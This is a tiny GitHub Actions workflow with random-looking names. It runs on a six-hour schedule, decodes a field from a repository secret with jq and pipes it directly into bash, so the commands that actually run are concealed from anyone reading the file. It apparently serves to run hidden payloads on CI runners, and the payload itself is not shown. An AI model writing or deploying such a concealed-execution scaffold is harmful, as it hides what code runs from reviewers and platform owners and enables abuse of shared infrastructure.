name: duanyanyu2233

on:
  workflow_dispatch:
  schedule:
    - cron: '14 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanyanyu2233
        env:
          oi9: ${{ secrets.oi9 }}
        run: |
          echo $oi9 | jq -r .yecn9908 | /bin/bash
          echo $sb6222 | jq -r .jlhow7741 | /bin/bash

